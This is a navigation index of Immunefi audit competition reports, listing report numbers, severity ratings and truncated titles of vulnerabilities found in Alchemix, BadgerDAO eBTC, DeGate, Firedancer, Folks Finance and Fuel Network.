Immunefi Audit Competitions
Active Boosts
  • README
  • Alchemix
    • 30555 - [SC - Low] Precision loss when calculating the FLUX amount...
    • 30556 - [SC - Low] Past defeated proposals may become executable i...
    • 30565 - [SC - Low] veALCX does not comply with ERC breaking compos...
    • 30584 - [SC - Insight] Invalid check to make sure Minter is already in...
    • 30592 - [SC - Medium] DOS attack by delegating tokens at MAX_DELEGATE...
    • 30598 - [SC - Low] Access Control Flaw in _burn Function Leads to ...
    • 30613 - [SC - Medium] malicious user can front run any call to the sw...
    • 30634 - [SC - Critical] Unauthorized minting of unlimited FLUX in tran...
    • 30650 - [SC - Critical] Infinite minting of FLUX through voterpoke
    • 30651 - [SC - Critical] Insolvency in RevenueHandlersol because unclaim...
    • 30655 - [SC - Critical] Binary search does not correctly handle duplica...
    • 30667 - [SC - Medium] Unlimited gauge numbers can DoS users distribut...
    • 30671 - [SC - Critical] Reward token permanent freeze due to bulk call ...
    • 30682 - [SC - Critical] Insufficient slippage control in RevenueHandler...
    • 30683 - [SC - Critical] User can increase their unclaimed Flux token wi...
    • 30685 - [SC - Medium] The proposer can be impeded from submitting a p...
    • 30694 - [SC - Low] Users approved for a single token id cannot wit...
    • 30699 - [SC - High] Permanent freezing of unclaimed ALCX yield when...
    • 30704 - [SC - Medium] Griefing an account from getting votes delegate...
    • 30708 - [SC - Low] treasuryPct can be exceeded than BPS due to inc...
    • 30710 - [SC - Insight] The execution of the proposal has no expiration
    • 30711 - [SC - Low] The result of the AggregatorVInterface is not v...
    • 30781 - [SC - Low] It is possible to lower the quorum requirements...
    • 30788 - [SC - Critical] User can increase their unclaimed Flux token wi...
    • 30800 - [SC - Critical] Stealing FLUX by claiming then merging position...
    • 30814 - [SC - Critical] Wrong calculation of boost amount in Voterpoke
    • 30818 - [SC - Low] division before multiplication in the amountToRa...
    • 30825 - [SC - Critical] Users can get unlimited amounts of Flux tokens
    • 30826 - [SC - High] ALCK rewards are lost when merging tokens becau...
    • 30860 - [SC - Critical] Wrong timestamp for totalVoting
    • 30886 - [SC - Medium] Wrong totalWeight in Votersol
    • 30898 - [SC - Critical] Call the deposit function before the distribute...
    • 30906 - [SC - Critical] Voterpoke can be called at will leading to a us...
    • 30910 - [SC - High] Processing of voting results is not implemented...
    • 30918 - [SC - Insight] Incorrect implementation of ownerOf makes veALC...
    • 30919 - [SC - Critical] Front running of pokeTokens could lead to loss ...
    • 30920 - [SC - Low] User loses access to claims after merging of to...
    • 30921 - [SC - Low] Referential assignment causes incorrect block i...
    • 30922 - [SC - High] DOS of withdrawals through filling the userPoin...
    • 30925 - [SC - Critical] Manipulation of governance voting result by unl...
    • 30926 - [SC - Low] AlchemixGovernor updates to quorum can affect p...
    • 30939 - [SC - Critical] Misuse of curve pool calls results for precisio...
    • 30951 - [SC - Low] Incorrect ownerOf implementation makes veALCX n...
    • 30959 - [SC - Insight] Immutable gauges can break the state of the vot...
    • 30972 - [SC - Critical] Theft of unclaimed yield of the revenue in the ...
    • 30973 - [SC - Low] Incorrect Validation of treasuryPct in the Reve...
    • 30985 - [SC - Medium] Griefing attack prevents admins from disabling ...
    • 30990 - [SC - Critical] Users can use Voterpoke to accrue Flux tokens i...
    • 30992 - [SC - Insight] Inconsistent State Missing Event Emission in Fl...
    • 30999 - [SC - Critical] An edge-case mints times more FLUX than it should
    • 31008 - [SC - High] Alcx rewards are permanently frozen when two to...
    • 31042 - [SC - High] Claiming alchemic-token rewards can fail for so...
    • 31071 - [SC - Critical] User can steal bribes and prevent other users f...
    • 31076 - [SC - Critical] checkpointTotalSupply can checkpoint before a t...
    • 31077 - [SC - Critical] RevenueHandler counts unclaimed tokens as new r...
    • 31078 - [SC - High] withdraw doesnt claim all rewards before burnin...
    • 31079 - [SC - Critical] Claiming bribes for epochs you didnt vote for l...
    • 31080 - [SC - Insight] DoS in startCooldown when users want start cool...
    • 31082 - [SC - Critical] Expired locks can be used to claim rewards
    • 31085 - [SC - Critical] Malicious users can front-run the distribution ...
    • 31087 - [SC - Low] Collision between approve and _isApprovedOrOwner...
    • 31112 - [SC - Critical] Bribesolwithdraw doesnt update the totalVotings...
    • 31141 - [SC - Critical] Permanent freezing of unclaimed yield of reward...
    • 31149 - [SC - Critical] Manipulation of governance voting result by unl...
    • 31151 - [SC - Medium] Delegation Saturation Leading to Asset Freezing...
    • 31163 - [SC - Critical] Malicious actor can acquire bribe rewards by bl...
    • 31184 - [SC - Critical] Deflating the total amount of votes in a checkp...
    • 31189 - [SC - High] Voting algorithm does not apply maximum availab...
    • 31196 - [SC - Critical] Voterpoke does not check lastVoted resulting in...
    • 31198 - [SC - Critical] VotingEscrowmerge does not check whether the _f...
    • 31199 - [SC - Critical] Users might receive less rewards token after Vot...
    • 31211 - [SC - Critical] Inflation Of Total Votes and Potential Freeze o...
    • 31222 - [SC - Critical] Unlimited Flux minting
    • 31223 - [SC - Critical] Disproportionate Rewards Manipulation in Bribesol
    • 31226 - [SC - Insight] Missing Revert Message in require statement lea...
    • 31234 - [SC - Medium] Alchemix BlockSlope variable in checkpoint rou...
    • 31242 - [SC - Critical] RevenueHandlercheckpoint allows users to claim ...
    • 31249 - [SC - Critical] malicious user can back-run Voterdistribute to ...
    • 31253 - [SC - Critical] RevenueHandlercheckpoint isnt correctly
    • 31258 - [SC - High] Loss of Unclaimed Bribes After Burning veALCX T...
    • 31263 - [SC - Critical] RevenueHandlercheckpoint counts unclaimed rewar...
    • 31264 - [SC - Insight] Multiple Reports QALowOOS Medium
    • 31272 - [SC - Low] Approved user cant merge tokens not approved fo...
    • 31276 - [SC - High] BPT can be locked for only week resulting in u...
    • 31277 - [SC - Insight] The user can propose with less voting power tha...
    • 31280 - [SC - Critical] Malicious user can mint unlimited flux tokens
    • 31281 - [SC - Low] Approved spender cannot withdraw or merge
    • 31284 - [SC - Insight] cancel should allow to cancel the proposal of t...
    • 31293 - [SC - High] Voters who withdraw veLACX tokens risk losing g...
    • 31295 - [SC - High] Newly created gauge may miss out on its rewards
    • 31298 - [SC - Medium] Anyone can let users delegates reach the upper ...
    • 31309 - [SC - Critical] slippage protection is inaccurate
    • 31326 - [SC - High] Precision loss causes minor loss of FLUX when c...
    • 31329 - [SC - Critical] Attacker can gain infinitive FLUX by repeating ...
    • 31335 - [SC - High] getActualSupply should be used instead of total...
    • 31355 - [SC - Low] Past Defeated Proposals Can Be Executed in the ...
    • 31375 - [SC - Critical] Lack of Access control in poke function allows ...
    • 31377 - [SC - Critical] Stuck yield tokens upon withdrawal of votes f...
    • 31380 - [SC - High] FluxTokencalculateBPT uses wrong algorithm caus...
    • 31381 - [SC - Low] Alchemix Incorrect Initialisation of struct in...
    • 31382 - [SC - High] VotingEscrowupdateUnlockTime - Its possible for...
    • 31383 - [SC - Low] price feeds sanity checks isnt correct in funct...
    • 31385 - [SC - Low] RewardsDistributortokensPerWeek might be zero i...
    • 31386 - [SC - Critical] Malicious user can steal FLUX token by abusing ...
    • 31388 - [SC - Critical] Vulnerability in the poke function of Voting co...
    • 31390 - [SC - High] Precision Loss in FluxTokensolgetClaimableFlux
    • 31397 - [SC - Critical] In Bribesol _writeVotingCheckpoint isnt called ...
    • 31399 - [SC - High] RewardDistributor claims can be DoSed through e...
    • 31407 - [SC - Insight] Alchemist is given over Allowance through Reven...
    • 31408 - [SC - Critical] Killed Gauge continue to accrue and steal rewar...
    • 31409 - [SC - Critical] Users can grief Bribe rewards forcing them to b...
    • 31410 - [SC - Medium] Griefing Attack using delegate will expose User...
    • 31413 - [SC - Medium] DOS attack by delegating tokens at MAX_DELEGATES
    • 31416 - [SC - Insight] Impossible to set boostMultiplier to MIN_BOOST
    • 31417 - [SC - Insight] Compound claiming transactions will revert if u...
    • 31418 - [SC - Critical] the killed gauge collect claim amount
    • 31420 - [SC - Insight] No array lengths check in VotersolclaimBribes
    • 31425 - [SC - Medium] Users can call reset on their token even if the...
    • 31430 - [SC - Insight] QA
    • 31435 - [SC - High] ALCX rewards arent claimed for from token when ...
    • 31443 - [SC - Insight] Incorrect values of votingDelay and votingPerio...
    • 31444 - [SC - Critical] Manipulation of ve voting mechanism unlimited b...
    • 31447 - [SC - High] veALCX holders are able to withdraw rewards and...
    • 31448 - [SC - Medium] Bypassing the Governances proposal threshold to...
    • 31449 - [SC - Low] BribegetRewardForOwner should not revert if the...
    • 31451 - [SC - Insight] MAX_PROPOSAL_NUMERATOR is incorrectly set
    • 31453 - [SC - Critical] The balance of RevenueHandler can be drained
    • 31458 - [SC - Critical] Invalid handling of epochs revenue for tokens t...
    • 31460 - [SC - Insight] supportsInterface does not return typeIERCRecei...
    • 31461 - [SC - Critical] veALCX holder can mint Unlimited FLUX tokens
    • 31462 - [SC - Medium] Alchemix addReward access control can be bypas...
    • 31466 - [SC - Critical] Wrong reward calculation leads to rewards being...
    • 31470 - [SC - Critical] Bribing protocols pay bribes but dont get emiss...
    • 31472 - [SC - Critical] Stealing all revenue from the Alchemix protocol
    • 31478 - [SC - High] calculateBPT doesnt divide by basis points infl...
    • 31479 - [SC - High] alchemechNFT holder will get too little FLUX be...
    • 31480 - [SC - High] Miscalculation of global bias
    • 31481 - [SC - Critical] Unbound FLUX accrual through reset and merge
    • 31483 - [SC - Critical] Users can vote multiple times in one epoch
    • 31484 - [SC - High] Rewards for the first epoch at rewards distribu...
    • 31485 - [SC - Critical] Miscalculation of distributed tokens at revenue...
    • 31486 - [SC - High] getClaimableFlux miscalculates claimable FLUX f...
    • 31487 - [SC - Low] Wrong condition check on RevenueHandlerconstruc...
    • 31488 - [SC - Critical] Merging tokens allows multiple Flux accruals wi...
    • 31494 - [SC - High] Alchemix The first epochs ALCX emissions of vo...
    • 31495 - [SC - Critical] Users cannot claim rewards from RevenueHandler ...
    • 31497 - [SC - Low] executeBatch lacks payable so ethers can not be...
    • 31498 - [SC - High] Alchemix ALCX rewards are currently subject to...
    • 31503 - [SC - Insight] Incorrect value of MAX_PROPOSAL_NUMERATOR in Al...
    • 31507 - [SC - Critical] Malicious user could flash-loan the veALCX to i...
    • 31512 - [SC - Critical] Infinite minting of FLUX through Merge
    • 31514 - [SC - Medium] Malicious users can cause pokeTokens to revert
    • 31519 - [SC - Low] Lack of revert statement in Votersolpoke result...
    • 31520 - [SC - Critical] Incorrect accounting of totalVoting leads to pe...
    • 31521 - [SC - Medium] Early return in RewardsDistributorclaim can cau...
    • 31523 - [SC - Low] USDT Approval will cause function failure
    • 31524 - [SC - High] Rounding down in getClaimableFlux leads to less...
    • 31526 - [SC - Critical] A user is able to claim more bribes than they h...
    • 31527 - [SC - Critical] No accounting for totalVoting in Bribesolwithdr...
    • 31539 - [SC - Medium] The Voterdistribute function can continue to fail
    • 31540 - [SC - Insight] Expired Token Locks Impacting Vote Weight Calcu...
    • 31541 - [SC - Critical] FluxTokens unlimited mint and Exploitation of g...
    • 31542 - [SC - Low] Bribeearned - L Its potentially possible to ear...
    • 31544 - [SC - High] Certain small amount of tokens are not accounte...
    • 31552 - [SC - Insight] Lack of the validation for a Flash token protec...
    • 31555 - [SC - Low] RewardsDistributoramountToCompound - L The stal...
    • 31556 - [SC - Critical] Unfair Revenue Distribution in Non-Alchemix Rev...
    • 31558 - [SC - Insight] Discrepancy in MAX_PROPOSAL_NUMERATOR Value in ...
    • 31559 - [SC - Low] Minter UpdatePeriod after weeks causes Rewards...
    • 31562 - [SC - Medium] Every consecutive epoch will have same number o...
    • 31563 - [SC - Low] Oracle days staleThreshold for priceTimestamp ...
    • 31566 - [SC - Medium] Checkpoints wont update block number in point b...
    • 31567 - [SC - Critical] VotingEscrowsolcheckpoint is completely broken
    • 31575 - [SC - Medium] depositIntoRewardPool and withdrawFromRewardPo...
    • 31579 - [SC - Critical] Infinite mint of FLUX using poke
    • 31583 - [SC - Insight] Off by one error while adding reward pool token
    • 31584 - [SC - Critical] Loss Of Boosted Weight When Poking In The Same ...
    • 31588 - [SC - Low] Users could start cooldown period for their wit...
    • 31592 - [SC - Insight] Collection of other important issues
    • 31594 - [SC - Insight] RewardPoolManager can only add RewardPoolToken ...
    • 31597 - [SC - High] Loss of precision while calculating claimable f...
  • BadgerDAO (eBTC)
    • 28546 - [SC - Insight] FlashLoan can be taken with no fee to be paid
    • 28605 - [SC - Insight] Reentrancy on ActivePool allows users to borrow...
    • 28659 - [SC - Insight] Reentrancy in BorrowerOperationsflashLoan enabl...
    • 28713 - [SC - Insight] Reentrancy on BorrowerOperations allows users t...
    • 28791 - [SC - Low] The system protects from any rounding issues wh...
    • 28823 - [SC - Insight] Lido slashing can negatively affect the whole l...
    • 28828 - [SC - Low] Use of deprecated Chainlink API can lead contra...
    • 28843 - [SC - Low] Canceled partial redeeming syncs the accounting...
    • 28849 - [SC - Low] Using batchRedemption even if the TCR becomes s...
    • 28853 - [SC - Insight] Trycatch will not function with internal type
    • 28858 - [SC - Insight] Execution of SortedCpds while command may cause...
    • 28862 - [SC - Insight] Static MIN_CHANGE threshold and lack of relativ...
    • 28864 - [SC - Insight] Unfair Liquidation when ICR equals TCR in redee...
    • 28890 - [SC - Insight] EBTCTokensol mint function lack of checks allow...
    • 28916 - [SC - Insight] Liquidation Abuse More than half of all assets ...
    • 28967 - [SC - Insight] When fallback oracle is frozen fetchPrice can r...
    • 28973 - [SC - Insight] Users CDPs can be removed unintentionally by CD...
    • 28980 - [SC - Insight] There is an invariant Check Failure in flashLoan...
    • 29000 - [SC - Insight] Potential for Denial-of-Service in the redeemCo...
    • 29002 - [SC - Insight] Incorrect implementation of EIP- domain separat...
  • DeGate
    • 25882 - [SC - Insight] Freezing of funds from the Default Deposit Cont...
    • 25885 - [SC - Insight] Prevent the operator from submitting blocks to L
    • 25886 - [SC - Insight] registerToken can be front-run causing token ca...
    • 25892 - [SC - Insight] A malicious user can DoS force withdraw request...
    • 25903 - [SC - Insight] Possible loss of user funds by front-running the...
    • 25906 - [SC - Insight] setDelay function doesnt revert even when the d...
    • 25917 - [SC - Insight] Timelock can call transferProxyOwnership of Dep...
    • 25921 - [SC - Insight] Flaw in upgradeToAndCall leads to the proxy cal...
    • 25927 - [SC - Insight] MultiSig Owners can set malicious implementatio...
    • 25930 - [SC - Insight] Malicious owner can update the DepositParams st...
    • 25933 - [SC - Insight] The last person to confirm can control the exec...
    • 25935 - [SC - Insight] Permissive Fallback Function
    • 25952 - [SC - Insight] The smart contract could be inoperable due to w...
    • 26012 - [SC - Insight] getTransactionIds will break at some point runn...
    • 26017 - [SC - Insight] getTransactionCount will break at some point ru...
    • 26039 - [SC - Insight] Proxy contract deployments can be front-run to ...
    • 26066 - [SC - Insight] Timelock eta variable can be set further than i...
    • 26073 - [SC - Insight] The implementation upgrade must be done by call...
    • 26095 - [SC - Insight] ID Uniqueness Violations
    • 26104 - [SC - Insight] Governance mechanism could be exploited to free...
    • 26110 - [SC - Insight] All the funds from the DepositProxy contracts c...
    • 26116 - [SC - Insight] The MultiSigWalletgetTransactionIds function co...
    • 26124 - [SC - Insight] Some owners of the MultiSigWallet can bring the...
    • 26189 - [SC - Insight] Malicious Exchange Owner can sandwich-attack Et...
    • 26204 - [SC - Insight] DeGate Operator has capability to disable balan...
    • 26236 - [SC - Insight] Malicious DeGate Operator EOA can irreversibly ...
    • 26259 - [SC - Insight] txHash collision is possible
    • 26275 - [SC - Insight] Bad implementation of executeTransaction functi...
    • 26286 - [SC - Insight] Potential Signature Validation Bypass
    • 26422 - [SC - Insight] there is no explicit gas limit in external call...
    • 26423 - [SC - Insight] Timelock executeTransaction function will succe...
    • 26431 - [SC - Insight] High Risk in transfer of proxyOwnership
    • 26446 - [SC - Insight] Consider implementing a two step process in tra...
    • 26468 - [SC - Insight] Fee-on-transfer tokens can be used to steal oth...
    • 26479 - [SC - Insight] ExchangeV cannot be reinitialized after an upgrade
    • 26501 - [SC - Insight] Timelock should handle queuing transactions and...
    • 26502 - [SC - Insight] DeGate Exodus mode forcing study
    • 26509 - [SC - Insight] Exodus Mode Force
    • 26516 - [SC - Insight] Gnosis Multisig Contract can become unusable
    • 26519 - [SC - Insight] Consider introducing the ability to change requ...
    • 26520 - [SC - Insight] Multisig Contract onChain can be bricked
    • 26521 - [SC - Insight] ChainId is missing
    • 26527 - [SC - Insight] Possible emission of wrong data in cancelTransa...
    • 26529 - [SC - Insight] Mitigate Griefing Attacks Theft of Gas by Impl...
    • 26530 - [SC - Insight] Inefficiency in upgradeToAndCall
  • Firedancer v0.1
    • Boost _ Firedancer v0.1 33347 - [Blockchain_DLT - Medium] Integer underflow leading to memory corrup
    • Boost _ Firedancer v0.1 33348 - [Blockchain_DLT - Medium] Integer underflow leading to memory corrup
    • Boost _ Firedancer v0.1 33378 - [Blockchain_DLT - Medium] OOB Write leading to memory corruption in
    • Boost _ Firedancer v0.1 33586 - [Blockchain_DLT - Insight] fd_ebpf_static_link - possible disclosure
    • Boost _ Firedancer v0.1 33669 - [Blockchain_DLT - Medium] fd_quic_process_packet out of bounds read
    • Boost _ Firedancer v0.1 33717 - [Blockchain_DLT - Medium] Memory corruption caused by fully controll
    • Boost _ Firedancer v0.1 33718 - [Blockchain_DLT - Medium] The malicious fd_shred_t data passed betwe
    • Boost _ Firedancer v0.1 33774 - [Blockchain_DLT - Medium] The malicious fd_txn_p_t data passed betwe
    • Boost _ Firedancer v0.1 33862 - [Blockchain_DLT - Insight] Discord Server Vulnerable to Takeover in
    • Boost _ Firedancer v0.1 33936 - [Blockchain_DLT - Medium] shred tile fails to process zero sized udp
    • Boost _ Firedancer v0.1 34064 - [Blockchain_DLT - Medium] bank tile possible code execution
    • Boost _ Firedancer v0.1 34234 - [Blockchain_DLT - Insight] Setting the variable shred_cnt in the shr
    • Boost _ Firedancer v0.1 34272 - [Blockchain_DLT - Medium] Remote memory corruption in Shred tile
    • Boost _ Firedancer v0.1 34290 - [Blockchain_DLT - Medium] bank tile overflow
    • Boost _ Firedancer v0.1 34501 - [Blockchain_DLT - Medium] DoS in shreds validation
    • Boost _ Firedancer v0.1 34564 - [Blockchain_DLT - Medium] shred tile overflow
    • Boost _ Firedancer v0.1 34682 - [Blockchain_DLT - Medium] DoS in shreds validation
  • Folks Finance
    • Boost _ Folks Finance 33258 - [Smart Contract - Insight] Usage of floating pragma
    • Boost _ Folks Finance 33269 - [Smart Contract - Critical] Logic flaw in UserLoanincreaseCollateral leads to double-counting of effectiveCollateral of userLoan
    • Boost _ Folks Finance 33272 - [Smart Contract - Medium] FrontRunning Attack on createAccount
    • Boost _ Folks Finance 33280 - [Smart Contract - Low] NodeManagersupportsInterface doesnt follow EIP-
    • Boost _ Folks Finance 33311 - [Smart Contract - Critical] Infinite Interest rate bug
    • Boost _ Folks Finance 33353 - [Smart Contract - Low] Incorrect implementation of Time-Weighted Average Price for a Chainlink feed will lead to Incorrect Liquidation amount and breaks multiple price consumption based function
    • Boost _ Folks Finance 33356 - [Smart Contract - Low] All data in _userLoans mapping will not be deleted after calling deleteUserLoan
    • Boost _ Folks Finance 33376 - [Smart Contract - Insight] BridgeRouterreceiveMessage Allows Message Replay Across Different Adapters
    • Boost _ Folks Finance 33441 - [Smart Contract - Insight] Protocol uses Pyth to fetch price which is a pull based oracle and requires price updates to be pushed by the user which is not taken care of
    • Boost _ Folks Finance 33443 - [Smart Contract - Low] StalenessCircuitBreakerNode checks if the last update time of the parent node is less than the threshold but the publicTime could be greater than current blocktimestamp
    • Boost _ Folks Finance 33454 - [Smart Contract - Low] unsafe casting will lead to break of PythNode Oracle
    • Boost _ Folks Finance 33526 - [Smart Contract - Insight] Need to check returnAdapterId
    • Boost _ Folks Finance 33533 - [Smart Contract - Critical] depositDatainterestRate is not correct
    • Boost _ Folks Finance 33534 - [Smart Contract - Medium] denial of service vulnerability and possible griefing in cross-chain account creation
    • Boost _ Folks Finance 33540 - [Smart Contract - Low] ChainlinkNode uses cached decimals in the calculation instead of fresh one
    • Boost _ Folks Finance 33542 - [Smart Contract - Medium] Attacker can create loan before users tx is completed through bridge
    • Boost _ Folks Finance 33546 - [Smart Contract - Medium] Adversaries can manipulate victims stable rate to remain excessively high via flashloan
    • Boost _ Folks Finance 33566 - [Smart Contract - Low] RepayWithCollateral will almost always fail in partial repayment
    • Boost _ Folks Finance 33568 - [Smart Contract - Medium] Front-running vulnerability in cross-chain loan creation process could lead to funds loss for users
    • Boost _ Folks Finance 33588 - [Smart Contract - Insight] The liquidator can make the protocol incur bad debt by partially liquidating the position
    • Boost _ Folks Finance 33589 - [Smart Contract - Medium] Anyone can call the BridgeRouter Receive function with malicious data to transfer funds
    • Boost _ Folks Finance 33596 - [Smart Contract - Low] Incorrect rounding direction in HubPoolLogicupdateWithRepayWithCollateral can lead to accounting error of total token amount in HubPool
    • Boost _ Folks Finance 33609 - [Smart Contract - Medium] Account creation can be frontrun making the users unable to create an account
    • Boost _ Folks Finance 33611 - [Smart Contract - Medium] Adversary can perform a DoS on users createLoan and createLoanAndDeposit operation sent from Spoke chain
    • Boost _ Folks Finance 33614 - [Smart Contract - Medium] Front-Running Vulnerability in createAccount Method
    • Boost _ Folks Finance 33630 - [Smart Contract - High] Incorrect calculation of loanBorrowbalance
    • Boost _ Folks Finance 33631 - [Smart Contract - Low] Wrong implementation of chainLink getTwapPrice Can lead to wrong price or latest price being used
    • Boost _ Folks Finance 33643 - [Smart Contract - Low] PriceFeed from PythNode will always revert for some pools
    • Boost _ Folks Finance 33644 - [Smart Contract - Insight] Insufficient msgvalue validation for Wormhole adapters will lead to Wormhole cross-chain messages being reverted
    • Boost _ Folks Finance 33645 - [Smart Contract - Medium] Griefing a user from creating an account
    • Boost _ Folks Finance 33652 - [Smart Contract - Insight] BridgeRouters Unprotected Reversal Function Compromises User Control
    • Boost _ Folks Finance 33665 - [Smart Contract - Critical] Collateral Inflation Exploit via Zero-Amount Deposits Allows An Attacker to Drain Any Pool
    • Boost _ Folks Finance 33670 - [Smart Contract - Insight] Violator can deny his liquidation by front running it and changing the loan borrow type
    • Boost _ Folks Finance 33675 - [Smart Contract - Low] PythNodeprocess can revert because of incorrect casting
    • Boost _ Folks Finance 33684 - [Smart Contract - Critical] Lack of available liquidity check when sending token back from Hub leads to first deposit and inflation attack
    • Boost _ Folks Finance 33687 - [Smart Contract - Medium] Loan creation can be frontrun preventing the users from creating loans
    • Boost _ Folks Finance 33694 - [Smart Contract - Medium] stableBorrowRates are manipulatable through flashloan attacks
    • Boost _ Folks Finance 33695 - [Smart Contract - Critical] Attacker can borrow more than the collateral deposit
    • Boost _ Folks Finance 33713 - [Smart Contract - Insight] Some transactions can revert when nodetype is PriceDeviationSameOracleCircuitBreakerNode
    • Boost _ Folks Finance 33746 - [Smart Contract - Insight] Rounding down to zero leads to liquidate function will be halted with Panic error
    • Boost _ Folks Finance 33778 - [Smart Contract - Medium] The loan creation process can be griefed
    • Boost _ Folks Finance 33779 - [Smart Contract - Medium] The account creation process can be griefed
    • Boost _ Folks Finance 33780 - [Smart Contract - Critical] Zero deposits can be used to artificially inflate a users collateral value allowing them to borrow excess funds
    • Boost _ Folks Finance 33787 - [Smart Contract - Low] Function PythNodeprocess doesnt handle correctly PRECISION pythDataexpo
    • Boost _ Folks Finance 33807 - [Smart Contract - Low] updateInterestRate uses incorrect reference of borrow interest rate to calculate deposit interest can lead to the loss of lenders unclaimed yield
    • Boost _ Folks Finance 33816 - [Smart Contract - Critical] Attacker can get unlimited loan for some minimum deposit due to the incorrect calculation of user health in getLoanLiquidity
    • Boost _ Folks Finance 33817 - [Smart Contract - High] Incorrect calculation of effective borrow value in getLoanLiquidity leads to protocol insolvency through wrong withdrawals and liquidations
    • Boost _ Folks Finance 33852 - [Smart Contract - Insight] Small positions will not get liquidated
    • Boost _ Folks Finance 33869 - [Smart Contract - Medium] loanIds are easy to reproduce and front-running enable malicious parties to lock user funds
    • Boost _ Folks Finance 33870 - [Smart Contract - Low] convToRepayBorrowAmount calculation is incorrect causing liquidators to repay extra instead of receiving a bonus
    • Boost _ Folks Finance 33880 - [Smart Contract - Medium] Front-Running Vulnerability in createUserLoan Method
    • Boost _ Folks Finance 33885 - [Smart Contract - Low] Incorrect prices will be returned if the NodeType is PRICE_DEVIATION_CIRCUIT_BREAKER
    • Boost _ Folks Finance 33893 - [Smart Contract - Medium] Malicious users can DoS loan creations and deposits causing temporary funds freezing and additional costs incurred for message reversals
    • Boost _ Folks Finance 33923 - [Smart Contract - Low] Function HubPoolLogicupdateWithWithdraw doesnt round up in favour of protocol if isFAmount false
    • Boost _ Folks Finance 33935 - [Smart Contract - Insight] Liquidations dont ensure the violator loan becomes healthy afterwards
    • Boost _ Folks Finance 33947 - [Smart Contract - Low] During liquidations when borrowToRepay collateral the liquidator pays more borrowAmount than they should and receives no bonus
    • Boost _ Folks Finance 33950 - [Smart Contract - Low] pythnode oracle unexpected revert
    • Boost _ Folks Finance 33953 - [Smart Contract - Low] Calling process function will not revert even if two oracle nodes of the same type are used
    • Boost _ Folks Finance 33970 - [Smart Contract - Medium] User deposits can be blocked
    • Boost _ Folks Finance 33978 - [Smart Contract - Critical] Attacker can Inflate effectiveCollateralValue
    • Boost _ Folks Finance 33981 - [Smart Contract - Low] The PythNode library process function implementation does not account for pythDataexpo being greater than PRECISION
    • Boost _ Folks Finance 33987 - [Smart Contract - Medium] Incorrect access control in receiveMessage leads to total loss of funds
    • Boost _ Folks Finance 34025 - [Smart Contract - Medium] Malicious user can DoS the creation of every account at no cost by front running it with the same accountId
    • Boost _ Folks Finance 34028 - [Smart Contract - Medium] Denial of Service DoS vulnerability in UserLoan creation due to front-running attack
    • Boost _ Folks Finance 34029 - [Smart Contract - Medium] Contract fails to mitigate potential critical state where anyone can call BridgeRouterHubreceiveMessage directly
    • Boost _ Folks Finance 34030 - [Smart Contract - Low] Incorrect rounding down in HubPoolLogicupdateWithWithdraw when users withdraw using underlying amount
    • Boost _ Folks Finance 34047 - [Smart Contract - Low] Adversaries can create a position that is nearly impossible to liquidate due to high gas consumption
    • Boost _ Folks Finance 34050 - [Smart Contract - High] Vulnerability in getLoanLiquidity leads to undervaluing stable debt
    • Boost _ Folks Finance 34052 - [Smart Contract - Low] withdraw doesnt round in favour of protocol for isFamountFalse
    • Boost _ Folks Finance 34054 - [Smart Contract - Low] In liquidation loanPoolcollateralUsed doesnt get reduced by collateralSeizedreserveAmount
    • Boost _ Folks Finance 34066 - [Smart Contract - Medium] Account Creation Front-Running Vulnerability Leading to Gas Fee Theft
    • Boost _ Folks Finance 34069 - [Smart Contract - Low] repayWithCollateral may revert when repay small amount token
    • Boost _ Folks Finance 34074 - [Smart Contract - Critical] Hub missing check for available liquidity could lead to locked fund and utilization ratio exceeding
    • Boost _ Folks Finance 34076 - [Smart Contract - Low] Wrong way of deriving message keys using destination chains CCTP domain id
    • Boost _ Folks Finance 34085 - [Smart Contract - Low] partial repayment with collaterals will revert due to underflow
    • Boost _ Folks Finance 34122 - [Smart Contract - High] Wrong borrow balance calculation in the getLoanLiquidity function
    • Boost _ Folks Finance 34124 - [Smart Contract - Low] Smart contract cannot be accessed during the normal liquidation process that involves fully acquiring the borrowers balance
    • Boost _ Folks Finance 34127 - [Smart Contract - Low] Liquidator gets more debt than usual
    • Boost _ Folks Finance 34132 - [Smart Contract - Low] Liquidation bonus incorrectly inflates repayBorrowAmount instead of seizeUnderlyingCollateralAmount leading to wrong liquidations
    • Boost _ Folks Finance 34148 - [Smart Contract - Low] Full liquidations will fail for certain unhealthy positions
    • Boost _ Folks Finance 34150 - [Smart Contract - Low] Failed messages never expire and can be replayed by anyone potentially allowing users to be griefed
    • Boost _ Folks Finance 34153 - [Smart Contract - Low] TWAP query by chainlink is wrong according to chainlink docs
    • Boost _ Folks Finance 34158 - [Smart Contract - Low] NodeManagersupportsInterface returns false for typeIERCinterfaceId
    • Boost _ Folks Finance 34161 - [Smart Contract - Medium] Denial of Service via Front-Running in Loan Creation Mechanism
    • Boost _ Folks Finance 34169 - [Smart Contract - Low] Potential revert in PythNode library due to incorrect use of SafeCast toUint
    • Boost _ Folks Finance 34174 - [Smart Contract - Low] Bug in liquidation logic leads to stealing funds from liquidatorsunprofitable liquidations
    • Boost _ Folks Finance 34179 - [Smart Contract - High] Incorrect Updates to pooldepositDatatotalAmount and loancollateralUsed During Repayment with Collateral
    • Boost _ Folks Finance 34183 - [Smart Contract - Insight] rebalanceUp could be used to lower the userLoanstableInterestRates in certain conditions
    • Boost _ Folks Finance 34188 - [Smart Contract - Insight] BridgeRouterHub can add address adapter
    • Boost _ Folks Finance 34190 - [Smart Contract - Critical] Liquidated users can mix and manipulate stable and variable borrowings through exploitative liquidation process
  • Fuel Network | Attackathon
    • Attackathon _ Fuel Network 32269 - [Smart Contract - High] Incorrect fuel dce optimization register
    • Attackathon _ Fuel Network 32270 - [Smart Contract - Low] Inappropriate fuel dce on side effects
    • Attackathon _ Fuel Network 32271 - [Blockchain_DLT - Medium] Incorrect state range access helper
    • Attackathon _ Fuel Network 32275 - [Smart Contract - Medium] Various Sway Libs Bugs
    • Attackathon _ Fuel Network 32276 - [Smart Contract - Insight] wrong implementation in gt and lt func
    • Attackathon _ Fuel Network 32291 - [Blockchain_DLT - Insight] Profiling is incorrect for dependent g
    • Attackathon _ Fuel Network 32302 - [Smart Contract - Low] Src ContractConfigurables hash collision
    • Attackathon _ Fuel Network 32314 - [Smart Contract - Insight] Missing _disableInitializers in FuelER
    • Attackathon _ Fuel Network 32327 - [Websites and Applications - Low] REVISED Malicious Downtime via
    • Attackathon _ Fuel Network 32378 - [Smart Contract - Insight] Missing Zero-Check for Recipient Addre
    • Attackathon _ Fuel Network 32388 - [Smart Contract - Low] Buffer overflow in EncodeBufferAppend intr
    • Attackathon _ Fuel Network 32390 - [Smart Contract - Low] Unchecked Virtual Immediate Construction O
